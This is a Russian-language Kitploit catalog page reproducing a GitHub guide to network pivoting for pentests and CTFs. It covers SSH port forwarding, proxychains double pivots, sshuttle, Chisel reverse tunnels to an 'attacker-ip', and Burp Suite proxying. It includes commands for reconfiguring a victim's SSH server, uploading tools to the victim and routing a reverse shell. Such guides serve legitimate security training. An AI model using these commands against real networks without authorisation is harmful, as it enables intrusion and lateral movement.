Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
pentest-pivoting — Компактное руководство по сетевому пивотингу для пентеста / CTF-задач. | Kitploit
Инструменты/GitHubGitHub/t3l3machus/pentest-pivoting
Веб-прокси и перехватЛатеральное перемещениеСетевая безопасностьCTFТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingПодобранные Ресурсы
GitHubt3l3machus/pentest-pivoting

pentest-pivoting

Компактное руководство по сетевому пивотингу для пентеста / CTF-задач.

Репозиторий
2284412 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Руководство по пивотингу

Содержание

  1. Важные замечания
  2. SSH Динамическое перенаправление портов
  3. SSH Удалённое перенаправление портов
  4. SSH Локальное перенаправление портов
  5. Двойной пивотинг
  6. sshuttle
  7. Chisel
  8. Использование Burpsuite в качестве прокси
  9. Полезные ресурсы

Важные замечания

  • Не используйте ICMP echo-запросы (ping) для проверки SOCKS-прокси.
    SOCKS — это интернет-протокол, который обменивается сетевыми пакетами между клиентом и сервером через прокси-сервер. Практически SOCKS-сервер проксирует TCP-соединения на произвольный IP-адрес, а также обеспечивает возможность пересылки UDP-пакетов. Проверять его следует с помощью протокола на основе TCP (например, попробуйте SSH-подключение или отправьте HTTP GET-запрос хосту через туннель пивотинга).

  • NMAP должен использоваться с TCP connect сканированием (-sT) и без ping (-Pn)
    Это также относится к сканированию версий (-sV) и скриптовому сканированию (-sC). Их следует использовать в сочетании с -sT и -Pn.
    Примеры:

    root@kitploit:~
    proxychains nmap -sT -Pn -p- x.x.x.x
    proxychains nmap -sT -Pn -sV -sC -p 21,80,443,445 x.x.x.x
    

    Совет: Вы можете загрузить naabu на машину жертвы и сканировать как настоящий босс.

  • Использование скриптов и бинарных файлов с proxychains
    Один из советов по использованию proxychains: если вы запускаете интерпретируемую программу (например, Python-скрипт), лучше явно указать бинарный файл Python перед этим скриптом, даже если скрипт начинается с shebang, например:

    root@kitploit:~
    proxychains4 [-q -f proxychains.conf] python python_script.py
    

    Без явного указания интерпретатора скрипта трафик, генерируемый скриптом, иногда не будет маршрутизироваться через прокси так, как вы задумали, и сетевое соединение завершится ошибкой. Источник совета

  • Раскомментируйте строку «quite mode» в /etc/proxychains.conf, чтобы избежать вывода в stdout, который иногда может раздражать.
    Это всего лишь рекомендация.

SSH Динамическое перенаправление портов

Позволяет создать сокет на локальной машине (ssh-клиент), который выступает в роли SOCKS-прокси сервера. Когда клиент подключается к этому порту, соединение перенаправляется на удалённую машину (ssh-сервер), которая затем пересылает его на динамический порт конечной машины.

Как это настроить:

  1. Отредактируйте /etc/proxychains.conf и выполните следующее:

    • Раскомментируйте Dynamic chain.
    • Закомментируйте Strict chain и Random chain.
    • Добавьте строку socks4 127.0.0.1 9050 в конец документа (список прокси), сохраните и закройте файл. *Вы, конечно, можете использовать другой порт.
  2. Настройте SSH динамическое перенаправление портов:

root@kitploit:~
ssh -D 127.0.0.1:9050 user@victim-IP

Примеры использования:
Где x.x.x.x — IP-адрес хоста, принадлежащего туннелируемой сети:

root@kitploit:~
proxychains nmap -sT -Pn -p- x.x.x.x
proxychains smbmap -H x.x.x.x
proxychains ssh [email protected]

Чтобы использовать firefox через туннель:

root@kitploit:~
proxychains firefox

SSH Удалённое перенаправление портов

Если вы ищете способ получить обратную оболочку (reverse shell) через туннель пивотинга, это то, что вам нужно. Оно позволяет перенаправлять порт на удалённой машине (жертва) на порт локальной машины (атакующий).

Как это настроить:

  1. Подключитесь по SSH к машине жертвы.

  2. Отредактируйте /etc/ssh/sshd_config и выполните следующее:

    • Раскомментируйте GatewayPorts no и измените его на Yes. Сохраните и закройте файл.

    *Это очень важно, и многие руководства в интернете об этом не упоминают. Если этого не сделать, вы сможете настроить туннель только на 127.0.0.1, а не на 0.0.0.0, что в итоге приведёт к отсутствию перенаправления трафика, когда он исходит от любого хоста, кроме localhost.

    • Перезапустите службу SSH, чтобы изменения вступили в силу. sudo service ssh restart
    • Выйдите и вернитесь на свою машину.
  3. Настройте SSH удалённое перенаправление портов:
    По сути, после настройки, как описано выше, команда так же проста:

root@kitploit:~
ssh -R 2222:*:2222 user@victim-IP

Чтобы проверить, работает ли это, вы можете сделать следующее:
Запустите слушатель (например, netcat) на машине атакующего (на порту, который вы настроили для удалённого перенаправления, в этом примере 2222) и отправьте запрос с машины жертвы самой себе (localhost). В этом примере это будет nc 127.0.0.1 2222. Если машина атакующего получит соединение, это означает, что а) всё работает и б) каждое соединение от хостов пивотинга к victimip:2222 будет перенаправлено на машину атакующего.

Вы можете настроить несколько портов следующим образом:

root@kitploit:~
ssh -R 2222:*:2222 -R 3333:*:3333 user@victim-IP

Внимание: Запросы от внешних хостов (сеть пивотинга) должны быть адресованы на IP жертвы, чтобы они были перенаправлены обратно на машину атакующего.

*Вы также можете реализовать удалённое перенаправление портов, подключившись по SSH с машины жертвы к машине атакующего.

SSH Локальное перенаправление портов

Локальное перенаправление портов позволяет перенаправить порт на локальной машине (атакующий) на порт удалённой машины (жертва). Особенно полезно для сканирования локальных портов на жертве.

Использование:

root@kitploit:~
ssh user@victim-IP -L 8888:127.0.0.1:8086

Теперь вы можете использовать, например, nmap для сканирования порта 8086 на машине жертвы следующим образом:

root@kitploit:~
nmap -Pn -n -p8888 -sV 127.0.0.1

Двойной пивотинг

Пример реализации двойного пивотинга с помощью SSH динамического перенаправления портов и Proxychains.

Концепция:
Предположим, у нас есть следующие 4 машины.

IPРоль
10.10.10.10Атакующий
10.10.10.11Jumphost1
172.16.1.12Jumphost2
172.16.2.13Jumphost3

Атакующий может подключиться к Jumphost1.
Jumphost1 может подключиться к Jumphost2.
Jumphost2 может подключиться к Jumphost3.

  1. Чтобы получить доступ к Jumphost2, выполните инструкции по SSH динамическому перенаправлению портов, описанные ранее, для Jumphost1.
  2. Чтобы получить доступ к Jumphost3, отредактируйте /etc/proxychains.conf и добавьте ещё одну прокси-запись в конец документа. Теперь конец вашего proxychains.conf будет выглядеть примерно так:
root@kitploit:~
...
socks4 127.0.0.1 9050
socks4 127.0.0.1 9999
  1. Подключитесь по SSH к Jumphost1 и настройте ещё одно динамическое перенаправление портов для Jumphost2 (выбранный вами локальный порт должен совпадать с портом, указанным для второй прокси-записи в proxychains.conf):
root@kitploit:~
ssh -D 127.0.0.1:9999 user@Jumphost2

Теперь у вас должен быть доступ к Jumphost3.

sshuttle

sshuttle позволяет создать VPN-соединение с вашей машины до любого удалённого сервера через ssh, при условии, что на этом сервере установлен python 2.3 или выше. Для работы вам необходим root-доступ на локальной машине, но на сервере у вас может быть обычная учётная запись. Допускается запускать sshuttle более одного раза одновременно на одной клиентской машине, каждый раз подключаясь к другому серверу, поэтому вы можете находиться в нескольких VPN одновременно. Ознакомьтесь с репозиторием sshuttle на GitHub.

Использование:
Предположим, мы хотим сделать пивотинг в сеть 172.16.2.0/16:

root@kitploit:~
sshuttle -vvr root@victim 172.16.2.0/16

Если вы хотите использовать ssh-ключ:

root@kitploit:~
sshuttle -vvr root@victim --ssh-cmd 'ssh -i ~/.ssh/id_rsa' 172.16.2.0/16

Chisel

Chisel — это быстрый TCP/UDP-туннель, передаваемый через HTTP и защищаемый с помощью SSH. Один исполняемый файл, включающий как клиент, так и сервер. Написан на Go (golang). Он невероятно крут и полезен.

Установка:
Вы можете легко установить chisel на kali:

root@kitploit:~
apt install chisel

Для его использования вам также необходимо загрузить бинарный файл chisel на машину жертвы. Вы можете скачать готовые сборки здесь.

Пример локального перенаправления портов
На машине атакующего:

root@kitploit:~
chisel server -p 8000 --reverse

На машине жертвы:

root@kitploit:~
./chisel_1.7.7_linux_amd64 client attacker-ip:8000 R:1234:127.0.0.1:8443

Это перенаправит трафик с порта 1234 машины атакующего на порт 8443 машины жертвы.

Использование Burpsuite в качестве прокси

Burpsuite поддерживает возможность настройки прокси — невероятно полезная и мощная функция.

Как это настроить:
Запустите Burpsuite и выполните следующее:

  • Перейдите в Proxy/Options и нажмите add в разделе Proxy Listeners.
  • Укажите порт и интерфейс привязки.
  • на второй вкладке укажите хост и порт, на который вы хотите перенаправлять трафик.

В сочетании с настройкой SSH динамического перенаправления портов или sshuttle вы можете использовать Burpsuite для пивотинга трафика на нужные хосты, отправляя трафик на ваш локальный порт привязки. Полезный пример с gobuster dir brute через туннель (предполагая, что вы указали порт 2222 в качестве порта перенаправления):

root@kitploit:~
gobuster dir -u http://127.0.0.1:2222 -t 40 -w /some/dirlist.txt

Полезные ресурсы

  • https://artkond.com/2017/03/23/pivoting-guide/
  • https://catharsis.net.au/blog/network-pivoting-and-tunneling-guide/
  • https://medium.com/cyberxerx/how-to-setup-proxychains-in-kali-linux-by-terminal-618e2039b663
Скачать инструмент